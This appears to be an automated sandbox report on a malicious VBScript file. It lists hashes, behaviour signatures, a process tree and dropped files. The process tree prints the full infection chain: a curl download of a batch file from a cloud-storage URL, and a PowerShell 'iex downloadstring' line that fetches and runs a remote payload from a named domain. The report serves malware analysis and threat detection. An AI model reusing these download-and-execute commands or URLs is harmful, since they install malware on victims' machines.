Overview

overview

8

Static

static

1

ldvb.vbs

windows7-x64

1

ldvb.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    17s
  • max time network
    18s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/11/2024, 18:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ldvb.vbs

  • Size

    1KB

  • MD5

    eefbb9e4a9fd600d019cac1535868014

  • SHA1

    d24a2c0f2b6732bfe9de1c48e4ae6e11242948aa

  • SHA256

    9e06d175c76b3457bba2b4fbd688edcab82a5a55cff9be746d8fefbb0b637ab4

  • SHA512

    22537357f3436cfb20c97f05cc86a6b563783416a808323d6228bc7ee1c16a47ac6ee311014cdb2435d3b60e110dcbd1ff3781ae590f25a175f8d941fee84e72

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ldvb.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4204
    • C:\Windows\System32\curl.exe
      "C:\Windows\System32\curl.exe" -o "C:\Wins32Update_\up.cmd" "https://firebasestorage.googleapis.com/v0/b/ola445.appspot.com/o/bt?alt=media&token=a5082314-a2a5-435c-8ef5-198776034a00"
      2⤵
        PID:4620
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Wins32Update_\up.cmd" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('https://contablebar.shop/ll2310/at3') "
          3⤵
            PID:4976
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -nop -win 1
            3⤵
            • Blocklisted process makes network request
            • Drops startup file
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3396

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aqc40hew.tf5.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Wins32Update_\A
        Filesize

        297B

        MD5

        bb038fac811eadd2416418a256332a6c

        SHA1

        866257dcca41e019648a672c1f5e4be614c8aff4

        SHA256

        0aa85b2f36b77769772af83631079dbfed38d08502e1a60ae9d1a2dfffef8057

        SHA512

        ce40dd989e6e294f92fe1dced8cbb607e87c27bb5c5f8d61b1fe272a2b4a2540f3a9bcfaa36e9ec20093d2654bef78422624352ee0ab28e13a2d5c30369818d3

        Download Submit

      • C:\Wins32Update_\up.cmd
        Filesize

        463B

        MD5

        41eba80cb324d07670a3b61881535430

        SHA1

        748ba6f8572aff7e8e443013c1f0b252e76a24c5

        SHA256

        83fa1393c1facdd3cc103be13f25a289ef56b94fd2d3d4cadb83461d76745188

        SHA512

        c7da58a768c9e7da2980bc23709bcb2a1bcaa4d50cc3e8894469f36ff0888341ce446f2c35950b5bb8fc06431279b9b58c53d01a90d524b126be5c1e80e630b1

        Download Submit

      • memory/3396-4-0x00007FFD40BF3000-0x00007FFD40BF5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3396-11-0x0000019773FC0000-0x0000019773FE2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3396-15-0x00007FFD40BF0000-0x00007FFD416B1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3396-16-0x00007FFD40BF0000-0x00007FFD416B1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3396-17-0x0000019776510000-0x0000019776554000-memory.dmp

        Filesize

        272KB

        Download

      • memory/3396-18-0x00000197765E0000-0x0000019776656000-memory.dmp

        Filesize

        472KB

        Download

      • memory/3396-19-0x0000019776580000-0x000001977659E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/3396-35-0x00007FFD40BF3000-0x00007FFD40BF5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3396-36-0x00007FFD40BF0000-0x00007FFD416B1000-memory.dmp

        Filesize

        10.8MB

        Download